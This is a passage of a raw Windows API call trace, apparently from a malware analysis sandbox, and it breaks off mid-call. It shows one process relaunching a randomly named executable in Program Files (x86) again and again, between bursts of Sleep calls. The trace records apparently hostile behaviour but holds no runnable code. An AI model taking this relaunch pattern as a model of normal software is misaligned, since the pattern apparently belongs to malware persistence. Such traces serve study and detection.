[0191.636] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0191.636] NtClose (Handle=0x1a4c) returned 0x0 [0191.638] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x20dc, hThread=0x1a4c, dwProcessId=0x80c, dwThreadId=0x738), hNewToken=0x0) returned 1 [0191.655] Sleep (dwMilliseconds=0x1388) [0191.657] Sleep (dwMilliseconds=0x1388) [0191.661] Sleep (dwMilliseconds=0x1388) [0191.662] Sleep (dwMilliseconds=0x1388) [0191.664] Sleep (dwMilliseconds=0x1388) [0191.665] Sleep (dwMilliseconds=0x1388) [0191.667] Sleep (dwMilliseconds=0x1388) [0191.668] Sleep (dwMilliseconds=0x1388) [0191.670] Sleep (dwMilliseconds=0x1388) [0191.671] Sleep (dwMilliseconds=0x1388) [0191.673] Sleep (dwMilliseconds=0x1388) [0191.677] Sleep (dwMilliseconds=0x1388) [0191.678] Sleep (dwMilliseconds=0x1388) [0191.680] Sleep (dwMilliseconds=0x1388) [0191.681] Sleep (dwMilliseconds=0x1388) [0191.683] Sleep (dwMilliseconds=0x1388) [0191.684] Sleep (dwMilliseconds=0x1388) [0191.686] Sleep (dwMilliseconds=0x1388) [0191.687] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.688] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1cc4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.688] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.688] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65480) returned 1 [0191.688] NtQueryInformationFile (in: FileHandle=0x1cc4, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.688] NtClose (Handle=0x1cc4) returned 0x0 [0191.688] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.688] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1cc4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.688] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.688] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0191.688] NtClose (Handle=0x1cc4) returned 0x0 [0191.694] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x20d8, hThread=0x1cc4, dwProcessId=0x13a8, dwThreadId=0x708), hNewToken=0x0) returned 1 [0191.708] Sleep (dwMilliseconds=0x1388) [0191.710] Sleep (dwMilliseconds=0x1388) [0191.712] Sleep (dwMilliseconds=0x1388) [0191.713] Sleep (dwMilliseconds=0x1388) [0191.715] Sleep (dwMilliseconds=0x1388) [0191.716] Sleep (dwMilliseconds=0x1388) [0191.718] Sleep (dwMilliseconds=0x1388) [0191.719] Sleep (dwMilliseconds=0x1388) [0191.721] Sleep (dwMilliseconds=0x1388) [0191.725] Sleep (dwMilliseconds=0x1388) [0191.729] Sleep (dwMilliseconds=0x1388) [0191.730] Sleep (dwMilliseconds=0x1388) [0191.732] Sleep (dwMilliseconds=0x1388) [0191.733] Sleep (dwMilliseconds=0x1388) [0191.735] Sleep (dwMilliseconds=0x1388) [0191.736] Sleep (dwMilliseconds=0x1388) [0191.738] Sleep (dwMilliseconds=0x1388) [0191.741] Sleep (dwMilliseconds=0x1388) [0191.743] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.743] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20e0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.743] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.743] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65480) returned 1 [0191.743] NtQueryInformationFile (in: FileHandle=0x20e0, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.743] NtClose (Handle=0x20e0) returned 0x0 [0191.743] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.743] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20e0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.743] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.744] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64f00) returned 1 [0191.744] NtClose (Handle=0x20e0) returned 0x0 [0191.746] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x20bc, hThread=0x20e0, dwProcessId=0x814, dwThreadId=0x784), hNewToken=0x0) returned 1 [0191.763] Sleep (dwMilliseconds=0x1388) [0191.765] Sleep (dwMilliseconds=0x1388) [0191.767] Sleep (dwMilliseconds=0x1388) [0191.769] Sleep (dwMilliseconds=0x1388) [0191.774] Sleep (dwMilliseconds=0x1388) [0191.775] Sleep (dwMilliseconds=0x1388) [0191.777] Sleep (dwMilliseconds=0x1388) [0191.778] Sleep (dwMilliseconds=0x1388) [0191.780] Sleep (dwMilliseconds=0x1388) [0191.781] Sleep (dwMilliseconds=0x1388) [0191.783] Sleep (dwMilliseconds=0x1388) [0191.784] Sleep (dwMilliseconds=0x1388) [0191.786] Sleep (dwMilliseconds=0x1388) [0191.789] Sleep (dwMilliseconds=0x1388) [0191.791] Sleep (dwMilliseconds=0x1388) [0191.793] Sleep (dwMilliseconds=0x1388) [0191.794] Sleep (dwMilliseconds=0x1388) [0191.796] Sleep (dwMilliseconds=0x1388) [0191.797] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.797] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20ac, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.797] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.797] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65e00) returned 1 [0191.798] NtQueryInformationFile (in: FileHandle=0x20ac, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.798] NtClose (Handle=0x20ac) returned 0x0 [0191.798] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.798] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20ac, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.798] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.798] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c66100) returned 1 [0191.798] NtClose (Handle=0x20ac) returned 0x0 [0191.801] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x20d4, hThread=0x20ac, dwProcessId=0x13a4, dwThreadId=0x12e4), hNewToken=0x0) returned 1 [0191.817] Sleep (dwMilliseconds=0x1388) [0191.822] Sleep (dwMilliseconds=0x1388) [0191.823] Sleep (dwMilliseconds=0x1388) [0191.825] Sleep (dwMilliseconds=0x1388) [0191.826] Sleep (dwMilliseconds=0x1388) [0191.828] Sleep (dwMilliseconds=0x1388) [0191.829] Sleep (dwMilliseconds=0x1388) [0191.831] Sleep (dwMilliseconds=0x1388) [0191.832] Sleep (dwMilliseconds=0x1388) [0191.834] Sleep (dwMilliseconds=0x1388) [0191.837] Sleep (dwMilliseconds=0x1388) [0191.839] Sleep (dwMilliseconds=0x1388) [0191.840] Sleep (dwMilliseconds=0x1388) [0191.842] Sleep (dwMilliseconds=0x1388) [0191.843] Sleep (dwMilliseconds=0x1388) [0191.845] Sleep (dwMilliseconds=0x1388) [0191.848] Sleep (dwMilliseconds=0x1388) [0191.864] Sleep (dwMilliseconds=0x1388) [0191.865] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.865] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20c0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.865] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.865] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64980) returned 1 [0191.865] NtQueryInformationFile (in: FileHandle=0x20c0, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.866] NtClose (Handle=0x20c0) returned 0x0 [0191.866] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.866] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20c0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.866] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.866] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64180) returned 1 [0191.866] NtClose (Handle=0x20c0) returned 0x0 [0191.870] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x20c8, hThread=0x20c0, dwProcessId=0x490, dwThreadId=0xa28), hNewToken=0x0) returned 1 [0191.885] Sleep (dwMilliseconds=0x1388) [0191.887] Sleep (dwMilliseconds=0x1388) [0191.888] Sleep (dwMilliseconds=0x1388) [0191.893] Sleep (dwMilliseconds=0x1388) [0191.895] Sleep (dwMilliseconds=0x1388) [0191.897] Sleep (dwMilliseconds=0x1388) [0191.898] Sleep (dwMilliseconds=0x1388) [0191.900] Sleep (dwMilliseconds=0x1388) [0191.901] Sleep (dwMilliseconds=0x1388) [0191.903] Sleep (dwMilliseconds=0x1388) [0191.904] Sleep (dwMilliseconds=0x1388) [0191.906] Sleep (dwMilliseconds=0x1388) [0191.909] Sleep (dwMilliseconds=0x1388) [0191.910] Sleep (dwMilliseconds=0x1388) [0191.912] Sleep (dwMilliseconds=0x1388) [0191.913] Sleep (dwMilliseconds=0x1388) [0191.936] Sleep (dwMilliseconds=0x1388) [0191.938] Sleep (dwMilliseconds=0x1388) [0191.939] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.939] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x11e4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.939] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.939] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65e00) returned 1 [0191.939] NtQueryInformationFile (in: FileHandle=0x11e4, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.939] NtClose (Handle=0x11e4) returned 0x0 [0191.940] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.940] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x11e4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.940] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.940] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65f80) returned 1 [0191.940] NtClose (Handle=0x11e4) returned 0x0 [0191.942] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0xb90, hThread=0x11e4, dwProcessId=0x138c, dwThreadId=0xabc), hNewToken=0x0) returned 1 [0191.951] Sleep (dwMilliseconds=0x1388) [0191.953] Sleep (dwMilliseconds=0x1388) [0191.956] Sleep (dwMilliseconds=0x1388) [0191.958] Sleep (dwMilliseconds=0x1388) [0191.960] Sleep (dwMilliseconds=0x1388) [0191.965] Sleep (dwMilliseconds=0x1388) [0191.967] Sleep (dwMilliseconds=0x1388) [0191.968] Sleep (dwMilliseconds=0x1388) [0191.970] Sleep (dwMilliseconds=0x1388) [0191.974] Sleep (dwMilliseconds=0x1388) [0191.975] Sleep (dwMilliseconds=0x1388) [0191.977] Sleep (dwMilliseconds=0x1388) [0191.978] Sleep (dwMilliseconds=0x1388) [0191.980] Sleep (dwMilliseconds=0x1388) [0191.981] Sleep (dwMilliseconds=0x1388) [0191.983] Sleep (dwMilliseconds=0x1388) [0191.992] Sleep (dwMilliseconds=0x1388) [0191.993] Sleep (dwMilliseconds=0x1388) [0191.995] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.995] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x150c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.995] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.995] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65e00) returned 1 [0191.995] NtQueryInformationFile (in: FileHandle=0x150c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.995] NtClose (Handle=0x150c) returned 0x0 [0191.995] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.995] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x150c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.996] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.996] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0191.996] NtClose (Handle=0x150c) returned 0x0 [0191.999] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 